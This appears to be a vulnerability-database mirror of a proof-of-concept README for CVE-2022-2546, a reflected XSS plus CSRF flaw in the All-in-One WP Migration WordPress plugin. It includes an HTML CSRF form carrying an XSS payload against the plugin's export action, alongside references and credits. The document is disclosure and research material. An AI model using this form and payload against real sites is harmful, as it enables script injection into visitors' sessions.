Associated Vulnerability
Title:WordPress Plugin All-in-One WP Migration 跨站脚本漏洞 (CVE-2022-2546)Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress Plugin All-in-One WP Migration 7.63之前版本存在跨站脚本漏洞,该漏洞源于使用了错误的内容类型并且没有正确地转义响应,攻击者利用该漏洞可以制作一个请求,当任何访问者提交该请求时,将在响应中注入任意html或j
Description
All-in-One WP Migration < 7.63 - Unauthenticated Reflected XSS + CSRF
Readme
# ****All-in-One WP Migration < 7.63 - Unauthenticated Reflected XSS + CSRF****
## **Description**
The plugin uses the wrong content type for, and does not properly escape the response from the ai1wm_export action, allowing an attacker to craft a request that when submitted by any visitor will inject arbitrary html or javascript into the response that will be executed in the victims session.
## Proof of Concept
### **Attacker**
To reproduce the flaw, we can export all the website content by the plugin and insert an invalid name in the output file name.
[ATTACKER VIDEO](https://blog.hackingforce.com.br/pt/cve-2022-2546/POC_1.mp4)
By validating the vulnerability, it is possible to combine the attack with a CSRF, which will force the victim's browser to send a request with the payload.
### **Victim**
[VICTIM VIDEO](https://blog.hackingforce.com.br/pt/cve-2022-2546/POC_2.mp4)
## Code
```html
<form action="https://example.com/wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1" method="POST">
<!--
Note: The secret key must be obtained through other means.
It is stored in the site option `ai1wm_secret_key`, but is
static for the lifetime of the site.
-->
<input type="hidden" name="secret_key" value="[secret_key]">
<input type="hidden" name="ai1wm_manual_export" value="1">
<input type="hidden" name="archive" value="<img src=x onclick=alert('XSS')>">
<input type="submit" value="Get rich!">
</form>
```
## Affected versions
All-in-One WP Migration < 7.63
## References
[Sucuri](https://blog.sucuri.net/2022/08/wordpress-vulnerabilities-patch-roundup-august-2022.html)
[WPScan](https://wpscan.com/vulnerability/f84920e4-a1fe-47cf-9ba5-731989c70f58)
[Hacking Force](https://blog.hackingforce.com.br/pt/cve-2022-2546/)
[Cross-Site Scripting (XSS)](https://blog.hackingforce.com.br/en/xss/)
## Classification
Type: Cross-Site Scripting
OWASP TOP 10: **[A03:2021-Injection](https://owasp.org/Top10/A03_2021-Injection/)**
CWE: [CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')](https://cwe.mitre.org/data/definitions/79.html)
## Researchers/Hackers
Geovanni Campos (GeoZIN), Thiago Martins (Kirito), Jorge Buzeti (R3tr0), Leandro Inacio (Saitama), Lucas de Souza (Sinnat), Matheus Oliveira (Froyd), Filipe Baptistella (Baptistella), Leonardo Paiva (Megatron), Jose Thomaz (Pip3r), Joao Maciel (Yohan), Vinicius Pereira (Vini), , Hudson Nowak (Nowak) e Guilherme Acerbi (Ghost).
File Snapshot
[4.0K] /data/pocs/c96e91ed8b9fbdf79138385f50730a03d049725b
└── [2.4K] README.md
0 directories, 1 file
Remarks
1. It is advised to access via the original source first.
2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.